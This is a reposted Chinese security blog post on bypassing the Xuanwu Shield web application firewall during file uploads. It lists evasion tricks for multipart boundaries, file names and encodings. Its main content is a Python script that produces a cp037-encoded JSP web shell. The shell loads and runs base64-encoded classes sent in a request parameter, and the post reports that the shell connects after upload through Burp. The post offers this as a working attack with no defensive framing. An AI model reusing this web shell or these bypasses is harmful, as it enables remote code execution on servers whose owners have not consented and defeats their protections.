玄武盾的几种绕过姿势
2022-8-13 20:31:31 Author: 浪飒sec(查看原文) 阅读量:24 收藏

原文来自先知社区:

https://xz.aliyun.com/t/11607


文件名绕过

boundary等号前后空格绕过

Content-Type: multipart/form-data;boundary = ----WebKitFormBoundaryMJPuN1aHyzfAO2m3

boundary等号前后ascii码09绕过

Cp037编码绕过

文件名后加/绕过

畸形请求方法

文件内容绕过

unicode编码

cp037编码(脚本内置马支持后缀jsp/jspx,都可解析)

编码脚本

 #python2
 data = '''<?xml version="1.0" encoding="cp037"?>
 <jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
   <jsp:declaration>
    class PERFORM extends ClassLoader {
      PERFORM(ClassLoader c) { super(c);}
      public Class bookkeeping(byte[] b) {
        return super.defineClass(b, 0, b.length);
      }
    }
    public byte[] branch(String str) throws Exception {
      Class base64;
      byte[] value = null;
      try {
        base64=Class.forName("sun.misc.BASE64Decoder");
        Object decoder = base64.newInstance();
        value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
      } catch (Exception e) {
        try {
          base64=Class.forName("java.util.Base64");
          Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
          value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
        } catch (Exception ee) {}
      }
      return value;
    }
   </jsp:declaration>
   <jsp:scriptlet>
    String cls = request.getParameter("xxoo");
    if (cls != null) {
      new PERFORM(this.getClass().getClassLoader()).bookkeeping(branch(cls)).newInstance().equals(new Object[]{request,response});
    }
   </jsp:scriptlet>
 </jsp:root>'''
 fcp037 = open('cp037.jsp','wb')![](https://xzfile.aliyuncs.com/media/upload/picture/20220804173607-de2cfbb4-13d8-1.png)
 fcp037.write(data.encode('cp037'))

生成出来,burp选择paste from file

可以正常连接

喜欢就点在看哦~

长按识别二维码

欢迎投稿

EMAIL:
[email protected]


关注浪飒sec加粉丝群


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1ODM1MjUxMQ==&mid=2247487298&idx=1&sn=e4156507ead48e5eac38fa45abf8aefd&chksm=ea083b52dd7fb24444dc159ea1029f758caebcccb0802beb8df88744391333357d48b4024405#rd
如有侵权请联系:admin#unsafe.sh